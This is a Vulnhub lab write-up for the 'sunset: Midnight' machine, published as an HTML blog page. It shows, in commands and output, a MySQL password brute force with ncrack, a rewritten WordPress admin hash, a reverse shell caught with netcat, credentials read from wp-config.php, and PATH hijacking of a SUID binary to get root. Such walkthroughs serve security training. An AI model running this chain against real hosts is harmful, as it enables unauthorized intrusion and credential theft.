<HTML>
<HEAD>
<!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">

<title>Alienum</title>
<style>
* {
  box-sizing: border-box;
}

body{
background-color: rgba(0, 0, 0, 0.9);
}

li a{
color:#808080;
}

p{
color: #808080;
}

h1{
color: #808080;

}

h2 {
 color: #808080;
}

.tools h1 ,h2{
 padding-left: 50px;
 font-size: 20px;
}

.tools img{
 left: 5%;
 position: relative;
}

.btn-circle {
  height: 47px;
  width: 47px;
  padding: 6px 0px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 25px;
}

.footer{
  position: relative;
  bottom:0;
}

.social{
 position: relative; 
 bottom:0;
 left: 20px;
}

header{
text-align:center;
}
<!------------------menu-------------------->
.topnav {
  overflow: hidden;
  background-color: #333;
}
.topnav a {
  float: left;
  display: block;
  color: #f2f2f2;
  text-align: center;
  padding: 14px 16px;
  text-decoration: none;
  font-size: 17px;
}
.topnav .icon {
  display: none;
}
.topnav a:hover{
  background-color: #555;
  color: white;
}

@media screen and (max-width: 768px) {
  .topnav a:not(:first-child){
    display: none;
  }
  .topnav a.icon {
    float: right;
    display: block;
  }
}

@media screen and (max-width: 768px) {
  .topnav.responsive {position: relative;}
  .topnav.responsive .icon {
    position: absolute;
    right: 0;
    top: 0;
  }
  .topnav.responsive a {
    float: none;
    display: block;
    text-align: left;
  }
}


@media only screen and (max-width: 1024px) {

 .row{
 padding:absolute;
 }
 
 .col-12 {
   max-width: 100%;
 }
 
 footer{
  position: fixed;
}

.social{
	position: fixed;
	top: 20px;
	left: 75%;
}
}

	
.gallery{
}

.gallery img {
  position: relative;
  float:center;
  box-shadow: 0 4px 8px 0 rgba(99, 173, 118, 0.2), 0 6px 20px 0 rgba(99, 173, 118, 0.9);
  left: 1%;
}

.desc {
  padding: 15px;
  font-size: 20px;
  color:#808080;
  text-align: left;
}

pre {
	background: rgba(0, 0, 0, 0.9);
	border: 1px solid rgba(255, 255, 255, 0.15);
	padding: 10px;
	font-size: 16px;
	color: #aa759f;
	border-radius: 2px;
	text-wrap: normal;
	overflow: auto;
	overflow-y: hidden
}

code.highlighter-rouge {
	background: rgba(0, 0, 0, 0.9);
	border: 1px solid rgba(255, 255, 255, 0.15);
	padding: 0px 3px;
	margin: 0px -3px;
	color: #aa759f;
	border-radius: 2px
}

  </style>
	</HEAD>
	<BODY>	
	<div class="row">
		<div class="col-12">
		<nav class="navbar navbar-expand-lg">
			<div class="topnav" id="myTopnav">
				<a class="nav-link" href="../../index.html">Home <span class="sr-only">(current)</span></a>
				<a class="nav-link" href="../../tools.html">Tools</a>
				<a class="nav-link" href="../../vulnhub.html">Vulnhub</a>
				<a class="nav-link" href="../../about.html">About</a>
				<a href="javascript:void(0);" style="font-size:15px;" class="icon" onclick="myFunction()">&#9776;</a>
			</div>					
		</nav>
         <header>
		  <h1>sunset: Midnight, Vulnhub Writeup</h1>
		  <p>Posted by Alienum</p>
		</header> 
		<div class="gallery">
		  <p>
		   <div class="desc">Port Scan</div><br>
		    <img src="source/1.PNG" style="width:700px; height: 400px;"> 
		   </p>
		   <p>
		    <div class="desc">MySQL | Brute force</div><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ncrack -p 3306 --user root -P /usr/share/wordlists/rockyou.txt sunset-midnight
Discovered credentials for mysql on 10.0.2.52 3306/tcp:
10.0.2.52 3306/tcp mysql: 'root' 'robert'</code></pre></div></div>
			<br>
		    <img src="source/3.PNG" style="width:700px; height: 200px;"> 
		   </p>
		  <p>
		    <div class="desc">MySQL | UPDATE wp_users</div><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>root@h1pno:~# mysql -u root -p -h 10.0.2.52
Enter password:robert

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| wordpress_db       |
+--------------------+


MariaDB [(none)]> use wordpress_db;
MariaDB [wordpress_db]> show tables;
+------------------------+
| Tables_in_wordpress_db |
+------------------------+
| wp_commentmeta         |
| wp_comments            |
| wp_links               |
| wp_options             |
| wp_postmeta            |
| wp_posts               |
| wp_sp_polls            |
| wp_term_relationships  |
| wp_term_taxonomy       |
| wp_termmeta            |
| wp_terms               |
| wp_usermeta            |
| wp_users               |
+------------------------+

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                          | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $P$BaWk4oeAmrdn453hR6O6BvDqoF9yy6/ | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+

pdate wp_users set user_pass='$2y$12$Lnpe6P3puw1qNXeQLetw5uYg7PhsD7tfpU4JKsvTOTgYztRuk3mZK' where user_login='admin';
Query OK, 1 row affected (0.436 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [wordpress_db]> select * from wp_users;
+----+------------+--------------------------------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
| ID | user_login | user_pass                                                    | user_nicename | user_email          | user_url               | user_registered     | user_activation_key | user_status | display_name |
+----+------------+--------------------------------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
|  1 | admin      | $2y$12$Lnpe6P3puw1qNXeQLetw5uYg7PhsD7tfpU4JKsvTOTgYztRuk3mZK | admin         | example@example.com | http://sunset-midnight | 2020-07-16 19:10:47 |                     |           0 | admin        |
+----+------------+--------------------------------------------------------------+---------------+---------------------+------------------------+---------------------+---------------------+-------------+--------------+
1 row in set (0.001 sec)

MariaDB [wordpress_db]></code></pre></div></div>
		    <img src="source/4.PNG" style="width:600px; height: 200px;"> 
		   </p>
		    <p>
		    <div class="desc">Wordpress | TwentyTwenty Reverse shell</div><br>
		    <img src="source/5.PNG" style="width:400px; height: 300px;"><br>
		    <img src="source/6.PNG" style="width:700px; height: 300px;"><br>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl http://sunset-midnight/wp-content/themes/twentytwenty/404.php

""""""""""""""

nc -lvp 4444
listening on [any] 4444 ...
connect to [10.0.2.15] from sunset-midnight [10.0.2.52] 42724
Linux midnight 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64 GNU/Linux
 17:08:41 up  4:27,  0 users,  load average: 0.00, 0.02, 0.09
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ /usr/bin/script -qc /bin/bash /dev/null
www-data@midnight:/$ export TERM=xterm</code></pre></div></div>
		   </p>
		 <p>
		    <div class="desc">Search for Credentials</div><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight">www-data@midnight:/var/www/html/wordpress$ pwd
pwd
/var/www/html/wordpress

www-data@midnight:/var/www/html/wordpress$ cat wp-config.php | grep USER
cat wp-config.php | grep USER
define( 'DB_USER', 'jose' );

www-data@midnight:/var/www/html/wordpress$ cat wp-config.php | grep PASSW
cat wp-config.php | grep PASSW
define( 'DB_PASSWORD', '645dc5a8871d2a4269d4cbe23f6ae103' );</code></pre></div></div>
		  </p>
		  <p>
		    <div class="desc">Become jose | user.txt</div><br>
		    <img src="source/7.PNG" style="width:800px; height: 200px;"><br> 
		    <img src="source/8.PNG" style="width:700px; height: 300px;"><br>
		    <div class="desc">Become Root</div><br>
			<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>jose@midnight:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/status

jose@midnight:~$ strings /usr/bin/status
Status of the SSH server:
service ssh status

jose@midnight:~$ cd /tmp
cd /tmp
jose@midnight:/tmp$ echo "/bin/sh" > service
jose@midnight:/tmp$ chmod +x service
jose@midnight:/tmp$ export
declare -x PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"

jose@midnight:/tmp$ export PATH=/tmp:$PATH                         
jose@midnight:/tmp$ /usr/bin/status
/usr/bin/status
# cd /root
cd /root
# cat root.txt
cat root.txt
          ___   ____
        /' --;^/ ,-_\     \ | /
       / / --o\ o-\ \\   --(_)--
      /-/-/|o|-|\-\\|\\   / | \
       '`  ` |-|   `` '
             |-|
             |-|O
             |-(\,__
          ...|-|\--,\_....
      ,;;;;;;;;;;;;;;;;;;;;;;;;,.
~,;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;,  ______   ---------   _____     ------

db2def9d4ddcb83902b884de39d426e6

Thanks for playing! - Felipe Winsnes (@whitecr0wz)
# </code></pre></div></div>
		</div> 
		<footer>
			<div class="social">
				<a  href="https://github.com/alienaki">
				<img class="btn btn-circle" src="../../src/github.jpg" >
				</a>
				<a  href="https://twitter.com/AL1ENUM">
				<img  class="btn btn-circle" src="../../src/twitter.jpg" >
				</a>
				<a  href="https://www.hackthebox.eu/profile/314167">
				<img  class="btn btn-circle" src="../../src/htb.jpg" >
				</a>
				<a  href="https://tryhackme.com/p/aeriko">
				<img  class="btn btn-circle" src="../../src/THM.png" >
				</a>
				<br/>
			</div>				
		<footer>
		
		<script>
			function myFunction() {
			  var x = document.getElementById("myTopnav");
			  if (x.className === "topnav") {
				x.className += " responsive";
			  } else {
				x.className = "topnav";
			  }
			}
		</script>
	
	<!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

	</BODY>
</HTML>
